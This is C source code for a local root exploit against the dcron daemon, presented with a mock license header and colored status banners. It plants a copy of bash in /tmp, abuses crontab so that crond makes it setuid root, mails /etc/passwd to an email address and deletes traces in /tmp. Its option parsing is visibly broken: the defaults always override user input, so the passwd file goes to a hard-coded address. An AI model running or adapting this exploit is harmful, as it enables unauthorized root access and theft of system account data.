/***********************************************
 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
 ***********************************************/
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */


/*************************************************************************\
| ----====----====---- . . LOCAL  DCRON  EXPLOIT . . ----====----====---- |
|                                                                         |
|                            brought to you by                            |
|                                                                         |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
|                                                                         |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
|                                                                         |
\*************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PRINT_STATUS(x,p...) printf("\033[1;35m:::\033[0;35m    "x,##p)

char*cron_path;
char*email_address;
extern char**environ;

void print_banner(void) {
        printf("\033[1;37m\t\t ---===---===--- \033[0;31md\033[1;31mcron  ");
        printf("\033[1;33mLOCAL \033[1;36m EXPLOIT \033[1;37m---===---===---\n");
    }

void print_help(void) {
        printf("\n\t\tUsage:");
        printf("\t\033[0;35m./dcron -e your_email [-p path_to_crond]\n");
        printf("\033[0;37m\n");
    }

void make_tempfile(void) {
        FILE*temp;
        char*file="nnn";
        if((temp=fopen(file,"w"))==NULL) {
                perror("fopen!!!");
                (void)exit(1);
            }
        fprintf(temp,"###############################\n");
        fprintf(temp,"## DCRON EXPLOIT - TEMP FILE ##\n");
        fprintf(temp,"###############################\n");
        fprintf(temp,"\n");
        fprintf(temp,"crontab - << EOF\n");
        fprintf(temp,"* * * * * %s\n",cron_path);
        fprintf(temp,"EOF\n");
        fprintf(temp,"\n");
        fprintf(temp,"mail %s < /etc/passwd\n",email_address);
        fprintf(temp,"chmod 4755 /tmp/boomsh\n");
        fprintf(temp,"rm -f /tmp/cron* /tmp/gcc*\n");
        fprintf(temp,"\n");
        fprintf(temp,"crontab -d 2>&1 1>/dev/null\n");
        fprintf(temp,"printf '\033[0;37m'\n");
        fprintf(temp,"\n");
        fprintf(temp,"## DONE!\n");
        fflush(temp);
        fclose(temp);
        (void)chmod(file,0755);
        PRINT_STATUS("Tempfile ready!\n");
    }

void add_crontab_entry(void) {
        int status;
        pid_t pid;
        if((pid=fork())==0) {
                (void)execl("/usr/bin/crontab","-c","./",NULL);
                (void)_exit(-1);
            }
        (void)sleep(1);
        (void)waitpid(pid,&status,0);
    }

void remove_crontab_entry(void)
{
        int status;
        pid_t pid;
        if((pid=fork())==0) {
                (void)execl("/usr/bin/crontab","-d","./",NULL);
                (void)_exit(-1);
            }
        (void)sleep(1);
        (void)waitpid(pid,&status,0);
    }

void bombard_crond(void) {
        int i;
        setenv("PATH","/var/spool/cron:/usr/bin:.:/bin/:/usr/sbin",1);
        for(i=0;i<3;i++) {
                PRINT_STATUS("Adding a crontab entry ... \033[1;32m(%d/3)\n",i+1);
                add_crontab_entry();
                PRINT_STATUS("Removing the entry ... \033[1;32m(%d/3)\n",i+1);
                remove_crontab_entry();
            }
        PRINT_STATUS("Processing...!!\n");
    }

void make_boomsh(void) {
        u_char buf[5000];
        int sh,boomsh,e;
        sh=open("/bin/bash",O_RDONLY);
        if(sh==-1) {
                perror("copy!!!");
                (void)exit(1);
            }
        boomsh=open("/tmp/boomsh",O_WRONLY|O_CREAT);
        if(boomsh==-1) {
                perror("copy!!!");
                (void)exit(1);
            }
        while((e=read(sh,buf,5000))>0) {
                (void)write(boomsh,buf,e);
            }
        (void)close(sh);
        (void)close(boomsh);
        (void)chmod("/tmp/boomsh",0755);//crond will make it 4755 root!!!
}

void shell(void) {
        PRINT_STATUS("\033[1;37m  ----====---- \033[1;36m EXPLOIT \033[1;32m FINISHED \033[1;37m  ----====----\n");
        PRINT_STATUS("\033[1;37m  ---====-- \033[1;34m WAITING \033[1;35m FOR\033[5;33m ROOTSHELL! \033[1;37m  --====---\n");
        PRINT_STATUS("\033[1;37m  ---====-- \033[1;34m HIT RETURN \033[1;35m TO
\033[5;33m SYNC!!!! \033[1;37m  --====---\n");
        PRINT_STATUS("\033[1;37m  ----=====---- \033[1;32m!\033[1;34m!\033[5;0n!\033[1;33m!\033[5;0n!\033[5;0n!\033[0;30m ----====----\n");
        execle("/tmp/boomsh","boomsh",NULL,environ);
    }


#define DEFAULT_EMAIL_ADDRESS   "your-address@mail.com"
#define DEFAULT_CRON_PATH       "/usr/sbin/crond"

char* email_address = DEFAULT_EMAIL_ADDRESS;
char* cron_path = DEFAULT_CRON_PATH;

void get_options(int argc,char*argv[])
{
        int a;
#define GETOPT_ARGUMENTS "p:e:h"
        while((a=getopt(argc,argv,GETOPT_ARGUMENTS))!=EOF) {
                switch(a) {
                        case 'p':
                        cron_path=(char*)strdup(optarg);
                        break;
                        case 'e':
                        email_address=(char*)strdup(optarg);
                        break;
                        case 'h':
                        default:
                        (void)print_help();
                        (void)exit(0);
                    }
            }
        if(cron_path) {
                cron_path=DEFAULT_CRON_PATH;
            }
        if(email_address) {
                email_address=DEFAULT_EMAIL_ADDRESS;
            }
    }

// MAIN

int main (int argc,char*argv[]) {
        (void)print_banner();
        if(argc<2) {
                (void)print_help();
                (void)exit(0);
        }
        (void)get_options(argc,argv);
        PRINT_STATUS("Making /tmp/boomsh...\n");
        (void)make_boomsh();
        PRINT_STATUS("Making tempfile...\n");
        (void)make_tempfile();
        PRINT_STATUS("Bombing crond...\n");
        (void)bombard_crond();
        PRINT_STATUS("ROOTSHELL ENJOY!!!\n");
        (void)shell();
    }


syntax highlighted by Code2HTML, v. 0.9.1